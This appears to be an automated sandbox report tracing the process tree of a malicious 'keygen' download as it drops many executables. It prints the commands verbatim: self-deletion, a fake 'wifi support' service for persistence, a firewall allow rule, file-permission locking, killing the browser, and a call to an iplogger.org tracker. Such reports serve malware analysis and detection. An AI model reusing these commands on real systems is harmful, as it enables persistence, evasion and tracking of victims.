C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe"4⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL4⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"5⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exeC:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe 200 installp15⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops Chrome extension
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe"6⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exeC:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe 0011 installp15⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\1613213750407.exe"C:\Users\Admin\AppData\Roaming\1613213750407.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613213750407.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\1613213754829.exe"C:\Users\Admin\AppData\Roaming\1613213754829.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613213754829.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\1613213760360.exe"C:\Users\Admin\AppData\Roaming\1613213760360.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613213760360.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exeC:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP6⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
-
C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exeC:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-22QA6.tmp\23E04C4F32EF2158.tmp"C:\Users\Admin\AppData\Local\Temp\is-22QA6.tmp\23E04C4F32EF2158.tmp" /SL5="$80322,815708,121344,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent7⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\HappyNewYear\seed.sfx.exe"C:\Program Files (x86)\HappyNewYear\seed.sfx.exe" -pX7mdks39WE0 -s18⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Seed Trade\Seed\seed.exe"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"9⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/14Zhe7"8⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe"6⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 36⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 27165⤵
- Drops file in Windows directory
- Program crash
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding AD559F197BC827924C9AEFFC5433082C C2⤵
- Loads dropped DLL
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Program Files (x86)\gdiview\gdiview\GDIView.exe"C:\Program Files (x86)\gdiview\gdiview\GDIView.exe"1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffeeae36e00,0x7ffeeae36e10,0x7ffeeae36e202⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1632 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2124 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1552 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2744 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2736 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3584 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4392 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4668 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4740 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2980 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4792 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2856 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3020 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2996 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2924 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5784 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4308 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6016 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4776 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6268 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6296 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6428 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6568 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6736 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6888 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6744 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4676 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2456 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7156 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4872 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4832 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7004 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7132 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,11729051330729421281,4363447564650185853,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4520 /prefetch:12⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Control Panel
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious use of SendNotifyMessage
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\8CCB.exeC:\Users\Admin\AppData\Local\Temp\8CCB.exe1⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\a59d9ec4-e7c4-480c-83db-5d33fc859102" /deny *S-1-1-0:(OI)(CI)(DE,DC)2⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\8CCB.exe"C:\Users\Admin\AppData\Local\Temp\8CCB.exe" --Admin IsNotAutoStart IsNotTask2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\0f2f803d-dc5c-4a40-8481-85491b3eb529\updatewin1.exe"C:\Users\Admin\AppData\Local\0f2f803d-dc5c-4a40-8481-85491b3eb529\updatewin1.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\0f2f803d-dc5c-4a40-8481-85491b3eb529\updatewin2.exe"C:\Users\Admin\AppData\Local\0f2f803d-dc5c-4a40-8481-85491b3eb529\updatewin2.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\0f2f803d-dc5c-4a40-8481-85491b3eb529\updatewin.exe"C:\Users\Admin\AppData\Local\0f2f803d-dc5c-4a40-8481-85491b3eb529\updatewin.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\0f2f803d-dc5c-4a40-8481-85491b3eb529\updatewin.exe4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 35⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\0f2f803d-dc5c-4a40-8481-85491b3eb529\5.exe"C:\Users\Admin\AppData\Local\0f2f803d-dc5c-4a40-8481-85491b3eb529\5.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 5.exe /f & erase C:\Users\Admin\AppData\Local\0f2f803d-dc5c-4a40-8481-85491b3eb529\5.exe & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 5.exe /f5⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\8F7B.exeC:\Users\Admin\AppData\Local\Temp\8F7B.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 8F7B.exe /f & erase C:\Users\Admin\AppData\Local\Temp\8F7B.exe & exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 8F7B.exe /f3⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\977B.exeC:\Users\Admin\AppData\Local\Temp\977B.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\977B.exe"2⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\A8C2.exeC:\Users\Admin\AppData\Local\Temp\A8C2.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\B381.exeC:\Users\Admin\AppData\Local\Temp\B381.exe1⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\yhelsemo\2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\lcyfwvzd.exe" C:\Windows\SysWOW64\yhelsemo\2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create yhelsemo binPath= "C:\Windows\SysWOW64\yhelsemo\lcyfwvzd.exe /d\"C:\Users\Admin\AppData\Local\Temp\B381.exe\"" type= own start= auto DisplayName= "wifi support"2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description yhelsemo "wifi internet conection"2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start yhelsemo2⤵
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵
-
C:\Users\Admin\mdzgxwae.exe"C:\Users\Admin\mdzgxwae.exe" /d"C:\Users\Admin\AppData\Local\Temp\B381.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\fncgtraa.exe" C:\Windows\SysWOW64\yhelsemo\3⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config yhelsemo binPath= "C:\Windows\SysWOW64\yhelsemo\fncgtraa.exe /d\"C:\Users\Admin\mdzgxwae.exe\""3⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start yhelsemo3⤵
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul3⤵
-
C:\Users\Admin\AppData\Local\Temp\C67D.exeC:\Users\Admin\AppData\Local\Temp\C67D.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\DBEB.exeC:\Users\Admin\AppData\Local\Temp\DBEB.exe1⤵
